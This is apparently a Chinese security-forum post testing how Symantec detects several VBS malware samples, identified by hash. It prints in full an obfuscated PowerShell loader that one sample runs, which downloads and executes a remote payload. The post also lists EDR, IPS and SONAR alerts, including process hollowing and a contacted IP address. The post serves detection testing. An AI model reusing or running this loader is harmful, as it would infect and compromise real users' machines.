本帖最后由 GreatMOLA 于 2024-8-26 23:43 编辑
Symantec 静态 57x
5ebfa2e9d5c8fd6ecb9062ac8843e93886b2a744f34ccf93ab4395504e6b1d2a.vbs
- "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Serpentarian19='SUBsTR';$Lacertose++;}$Serpentarian19+='ing';Function Overpopulate($Underset){$Gaudfulnkaminationer=$Underset.Length-$Lacertose;For( $Gaudful=2;$Gaudful -lt $Gaudfulnkaminationer;$Gaudful+=3){$Hatters+=$Underset.$Serpentarian19.'Invoke'( $Gaudful, $Lacertose);}$Hatters;}function Udstes($hestestutterier){ & ($Proclivous) ($hestestutterier);}$Usaarbart=Overpopulate ' MpuoP.zS iUnl ilHaaT,/su5Ma.In0mu Q(DeWKriS nSpdSlo sw Ss H ,NP.T R ,a1 F0 a.Pa0Ga;Se spW,fi GnGr6Ru4 ;br C x,p6Ty4 ,;J, r avO.:.a1 y2Ko1Ap.L.0Z.)H, DGC e ,cFik Door/K,2St0Ma1Ej0E 0G.1Co0Br1 S FFli Ar,ue,rflio wxP /Ra1S.2St1E..Ma0H. ';$Demodulatorerne=Overpopulate ' rU csl eBer H-HiA tgOreNonclt.a ';$Offervilligeres=Overpopulate 'Anh nt Ct spDisI,:Dy/S,/MitP,rR.i,rcCoo .tP,eSuxC bEraBecSpaChuco.FirD.oCr/S,w,ipS.- pa.rd.emU,iFinRa/QuuAnsdre ,r.asPa/U,F.rrFie,ed ,eAnl .i .gLegB,rGye Fn.hd,ieRh.ApqCrxStd ,>F,h.rtOrt,ap ,:Tu/.a/ ,chopInaA,n,teKol B- Pap dFrm SiBjnDihH.o .s ItNo. NcNooElmge/BeF.orL.evodIne RlTriPegh,g.krBreAdnGed aeFr.Roq,lxA.dU ';$Affaldsdyngerne20=Overpopulate 'Oz>Bl ';$Proclivous=Overpopulate ' ki SeOuxKo ';$Derier79='Expectance';$Gelfomino = Overpopulate 'Fee ,cGrh noNo .%T,aNepSkp ldUna Et oa %B,\PrRCra Bt riPeoSp. SA uc lcIn .u&.t&D, M,eHjcYeh RoRe .ht T ';Udstes (Overpopulate 'H $ TgCal CoOvb Ca tl ,:TeOE v LeH.r RfStlPlsAloMemFom leSy2Le2Pr6Sn=Li(Frc smTrdLe .p/ AcGa De$ .GA e Nl ef AoPamimi,pnBeoKl)S ');Udstes (Overpopulate ' O$AngOplTioUpbGla tlUn:Prh hoBid Ag HeJ pGuoMud ,geneRy= T$.iOSnf,ef,eeBrr ,v iStlW.l ispg eKir.keKas A.Ins ,pBalTuishtFo(Sy$alA ,fO f a,ol Bd .s,adPryOpnRegT eMirB.n LeBe2 E0Fi) t ');Udstes (Overpopulate 'Pr[ INN,eCetle.HySMeeS,r vT,iFlcade PPAcoSoiStn.pt DM.oa Vn ,aC,gBle erCl]S.: B:T SR.e Nc ,u lrAli,lt FyDeP r Oo St eo ncPao LlHa Bo= h S[MiNPleR,tMe.,aS Ue ,c TuParB,i NtSuy HPj,r,eo TtSvoUrc o kl.fTQuyr pUne K] .: ,:.aTTolBlsdg1 F2Ha ');$Offervilligeres=$hodgepodge[0];$Sskendeflok= (Overpopulate 'Fa[ DISCUZ_CODE_31 ]nbsp; g .lGroc,bGaa.olNa:JaB e.esFiu.pdSplCoeI tUn=ReN,aeS.wLi- POPlbFrjUneDocU tDe SS,oyt sEttSeeU.mba.GeNO,eRat.r.AnWMaeR,bSaCM.lKri De ena,t');$Sskendeflok+=$Overflsomme226[1];Udstes ($Sskendeflok);Udstes (Overpopulate ' M$ oB ke ,sheuAldH.l,aerntDe.S,HEieDaaDed ee.ar.os i[,k$EnDS eTimPoo pdPauAulBraAatInoN r,beInrgrnChe P]Sk=Re$F,U CsSla a rAfb HaM.rU,t r ');$Inchoation=Overpopulate 'Me$TrBHyeU,s FuOsdAmlBreBrts .PsDImoSkwFon.olCroM.aRed.nF,eisalb.eHo( F$NeORefAtf eeIarPovteiLalFol ViBegMaeGorU.eNossp,,a$StT Oz BaRorPrdWao.am.o) k ';$Tzardom=$Overflsomme226[0];Udstes (Overpopulate 'Da$RegPhlAfo ,bUoa,alab:.npO.eF,aFrr .tGeeMenK,=Sk(.cTPheA.sAft ,-FoPDea.otKnhB. a$.rT TzUda TrO.dHaoFdmUn)Up ');while (!$pearten) {Udstes (Overpopulate ',l$S.g lV.oTibRaa.ulSk: PkApa ,mO ePtlCau lKadBrsRafA.rMaa vkFykTreUn=.e$ Gtd.rT u aeBe ') ;Udstes $Inchoation;Udstes (Overpopulate ' CSS tIna Mr,ntb,- CSS.lb,eFaeSnpGa e4 P ');Udstes (Overpopulate ' .$GygBel,koRubwiadulmi: op Oepoa CrBrt,ie rnCh=M,(.uTWee UsDotUn-,kP Pa ,tSth re$TrTOvzKoaTor ,d .oInmPr) , ') ;Udstes (Overpopulate 'Ne$ .gUnlTaoSkb La Dl.o:,ltS aEkkPhnPheBum kmReeInlD iArgErhF.eTrdRa=Vi$U.g.ylTao,ub,sas.l C:thO,nxG i ed AeStrameNenKnd ceFis F+ u+,a%,n$ ,hKooBedT,gFoe ,pRko,edspg ,ePe.GacBeo iu .nentOp ') ;$Offervilligeres=$hodgepodge[$taknemmelighed];}$Rackers=341780;$Rejuggle=26949;Udstes (Overpopulate 'Br$Fag el.loAfbVeaCulSi:BePnoiFll toF,tHjeDanFr4Ry7.p P =Ta HeGSheBatM.-FaCMyofonFrtH eD,n Vt A .a$ ,T AzSeaSnrStd oRomm ');Udstes (Overpopulate 'Bl$SegD lAsoB,bFoa.rl P: MTBerSeoHas hsS.a,pm .fB uL nF.dResKd =s, i[r.SS,yP.s TtLae,lm ,. aC BoLenOvv .eSorM,tbi]Ro:Se:PaFTrrGro,emSjBSmaArsteeMi6 ,4ViSSat .r SiM nJogTe(an$NoP SiBal.gorvt fe,lnsa4.r7el)Gl ');Udstes (Overpopulate 'Sm$,ugUnlCoo.mbLoaPrl,v: FOSkpPasPomApn ii enCag leDirGos n B.=P Ej[GaSAfyCrsS tFoeOvmUd..oT,aev.xMitFo.AfEDonFucFooHod.yiErnS,gUn]Af:Ru:QuA.eSP.C ,ISyITr.TiGKaeS tKaSEttPor,iiDdnKugKi( A$.iTRerBooHasAssMia m efC.uNon dAnsLi) , ');Udstes (Overpopulate ' G$FogKolBaotob HaRolPl: oUT a.arPrtIoiHagSheUdsE,= F$PoO ,pC,sSum FnO.iAnnD.gthePirM s e.Res,ouEnb sLrt.nr iiUdnOugA.(Ri$ TR,ta Nc AkMaeSarDessa,Ta$StR ReBojMauEvg,ogKolFeeIl) E ');Udstes $Uartiges;"
复制代码
EDR 告警: Powershell launched with suspicious command and attempting process injection using process hollowing technique、Microsoft signed process used process hollowing technique - Method 2
IPS 拦截: Trojan.Backdoor Activity 757, IP: 172.111.137.133
SONAR 检测: wscript.exe;关联补救: wab.exe
a1ef9950b2c2bab6fc3288a104fa7372804df05c9a0bee235ec0082cd7dda5af.vbs
bdd678604bbefecbc2b54dfd55b1cd677e151bf1e5ee59ab2860363c27d73d16.vbs
c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs
双击后立即检测:
EDR 告警: PowerShell dropped a malicious file、Microsoft signed process launched suspicious windows process - Method 89
SONAR 检测 (对释放的 exe c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs
.exe): SONAR.SuspLaunch!g89
|